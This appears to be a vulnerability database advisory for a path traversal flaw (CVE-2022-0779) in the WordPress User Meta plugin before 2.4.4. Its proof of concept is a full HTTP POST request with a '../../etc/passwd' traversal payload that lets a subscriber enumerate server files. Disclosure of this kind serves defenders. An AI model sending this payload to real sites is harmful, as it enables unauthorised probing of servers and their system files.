WordPress Plugin Vulnerabilities

User Meta < 2.4.4 - Subscriber+ Local File Enumeration via Path Traversal

Description

The plugin does not validate the filepath parameter of its um_show_uploaded_file AJAX action, which could allow low privileged users such as subscriber to enumerate the local files on the web server via path traversal payloads

Proof of Concept

As a subscriber, submit a dummy image on a page/post with a File Upload field is embed, intercept the request and change the file path parameter

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 158
Connection: close
Cookie: [subscriber+]

field_name=test&filepath=/../../../../../../../../etc/passwd&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=4286c1c56a&is_ajax=true

If the response contains the um_remove_file, then the file exist on the server, otherwise it does not

Affects Plugins

Plugin icon
user-meta
Fixed in 2.4.4

References

CVE
CVE-2022-0779

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22
CVSS
3.1 (low)

Miscellaneous

Original Researcher
Julien Ahrens
Verified
Yes
WPVDB ID
9d4a3f09-b011-4d87-ab63-332e505cf1cd

Timeline

Publicly Published
2022-05-16 (about 1 years ago)
Added
2022-05-16 (about 1 years ago)
Last Updated
2022-05-17 (about 1 years ago)

Other

Published
Title
Published
2019-03-07
Title
Caldera Forms Pro < 1.8.2 - Unauthenticated Arbitrary File Read
Published
2021-10-29
Title
Download Monitor < 4.4.7 - Admin+ Arbitrary File Download
Published
2021-01-15
Title
Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download
Published
2019-07-23
Title
WPS Child Themes Generator <= 1.1 - Path Traversal
Published
2014-08-01
Title
Advanced Dewplayer <= 1.2 - download-file.php dew_file Parameter Traversal Arbitrary File Access